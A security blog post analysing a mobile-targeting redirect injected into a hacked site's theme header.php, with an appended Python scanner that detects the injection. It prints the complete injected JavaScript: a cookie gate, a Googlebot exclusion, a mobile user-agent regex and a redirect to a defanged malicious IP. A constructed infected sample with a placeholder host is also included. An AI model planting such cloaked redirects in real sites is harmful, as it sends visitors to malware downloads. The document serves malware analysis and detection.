Website Malware Targets Mobile Platforms

January 2, 2017, by Cesar Anjos


Navigating the web on a mobile device can be tricky even when you’re browsing clean sites. If hackers are involved, the frustration of a pop-up can turn into the dangerous possibility of harmful mobile malware.

The increase in mobile internet browsing has prompted attackers to adapt their techniques, targeting mobile-specific platforms and distributing spam and malware to these devices. Being proactive about the security of your site is key to keeping your visitors safe whether they’re on a desktop, laptop, tablet or phone.

Mobile Browser Redirects from Hacked Sites

Hackers are taking advantage of the growing mobile audience by showing mobile visitors unwanted pop-ups and redirecting them to malicious sites. Recently, we analyzed a hacked site that exhibited exactly these behaviors. During our investigation, we found the following code infecting the theme's header.php file:

<script>
if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("ooglebot")==-1){if(/(android|bb\d+|meego).+mobile
|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox
|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|
xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)
|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|
cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|
fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|
tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|emu|jigs|kddi|keji|kgt( |\/)|klon|kpt |
kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)
|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)
|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a
|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|
ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-
|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60
|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){
var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}}
)(navigator.userAgent||navigator.vendor||window.opera,'hxxp://185(.)93(.)187(.)41/kt/JpNx9n');}
</script>

This code specifically targets mobile devices and redirects them to a series of malicious websites:

  • Starting from: hxxp://185(.)93(.)187(.)41/kt/JpNx9n
  • Then, going to different sub-pages, such as hxxp://www(.)bestphoneapps(.)mobi (which is involved in malware campaigns)
  • Finally landing on hxxps://mobrevflwms(.)com, also related to malware campaigns
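As an added example that is not part of the original post, the following Python scanner looks for the combination of traits in the snippet above (the _mauthtoken cookie gate, the Googlebot exclusion, the mobile user-agent regex, the cookie set, and the redirect to an IP-literal URL) in raw file contents and across a theme directory. The indicator labels, the sample file contents and the 203.0.113.10 placeholder host are constructed for this example.

```python
import re
from pathlib import Path

# Indicators of the cookie-gated, bot-excluded, UA-conditional redirect shown
# above; each is a label plus a regex applied to raw file contents.
INDICATORS = {
    "cookie_gate":     re.compile(r'document\.cookie\.indexOf\("_mauthtoken"\)'),
    "bot_exclusion":   re.compile(r'indexOf\("ooglebot"\)'),
    "mobile_ua_regex": re.compile(r'\(android\|bb\\d\+\|meego\)\.\+mobile', re.I),
    "cookie_set":      re.compile(r'document\.cookie\s*=\s*"_mauthtoken=1'),
    "redirect":        re.compile(r'window\.location\s*=\s*\w+\s*;'),
    "ip_literal_url":  re.compile(r'https?://\d{1,3}(?:\.\d{1,3}){3}/'),
}

def scan_text(text):
    """Return the labels of every indicator present in a file's contents."""
    return [label for label, rx in INDICATORS.items() if rx.search(text)]

def assess(text, threshold=3):
    """Flag a file once it matches `threshold` indicators: a lone
    window.location assignment is normal, the combination with the cookie
    gate and the Googlebot exclusion is not."""
    hits = scan_text(text)
    return {"hits": hits, "suspicious": len(hits) >= threshold}

def scan_tree(root, suffixes=(".php", ".js", ".html")):
    """Walk a theme or plugin directory and map suspicious files to their hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            result = assess(path.read_text(errors="replace"))
            if result["suspicious"]:
                findings[str(path)] = result["hits"]
    return findings

# Constructed samples, not real infected files: the injected block with a
# shortened UA regex and a TEST-NET placeholder host, and a benign cookie check.
SAMPLE_INFECTED = r'''<script>
if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("ooglebot")==-1){
if(/(android|bb\d+|meego).+mobile|avantgo|blackberry|ip(hone|od|ad)/i.test(a)){
var tdate = new Date(new Date().getTime() + 1800000);
document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}}
)(navigator.userAgent||navigator.vendor||window.opera,'http://203.0.113.10/kt/EXAMPLE');}
</script>'''
SAMPLE_CLEAN = '''<script>
if (document.cookie.indexOf("consent") == -1) { showBanner(); }
</script>'''
```

Run `scan_tree("/path/to/wp-content/themes")` to list every theme file that matches three or more indicators; raise the threshold if a site legitimately uses device-conditional redirects.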

Mobile and Desktop Malware Downloads

Depending on the mobile browser and device your visitors are using while accessing the website, victims are either presented with a toolbar download page or are redirected to a mobile app download page. Both of these scenarios put website visitors in a dangerous position. If victims inadvertently add the mobile malware components to their devices, there can be serious consequences.

A few of the dangers of mobile malware include:

  • Allowing attackers to arbitrarily access, read, and interact with emails and backend interfaces;
  • Theft of data such as media files;
  • Ads injected into pages where they do not belong;
  • Leaking sensitive information from the victim's browsing activity.

If visitors happen to land on those pages on a desktop, they may be exposed to situations such as:

  • Installation of ransomware;
  • Installation of PUPs (potentially unwanted programs, such as injectors);
  • Installation of keyloggers;
  • Installation of various rootkits, or having the computer added to a botnet and used against other targets;
  • Covert takeover of the browser to carry out actions in any backend the victim has access to, such as any website they own or manage.

As a rule of thumb, it's best to never install anything you don't explicitly mean to, and if you find yourself on a page that has no relation to the website you were visiting, leave immediately.

Protecting Your Site

As website owners, it’s our responsibility to ensure that our visitors have the best experience possible and will not be at risk when accessing our web properties.

If you’re concerned about your site, or a site that you’re visiting, scanning it can provide some insight. Our free online scanner (SiteCheck) is tailored to emulate different mobile user agents and warn about issues that may affect a visitor's device when accessing a particular website.

If you are detecting similar redirects or suspect any unusual behavior, we are here to help.


Categories: Website Malware Infections, Website Security
Tags: Conditional Malware, Drive-by-Download, Malvertising, Redirects

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.
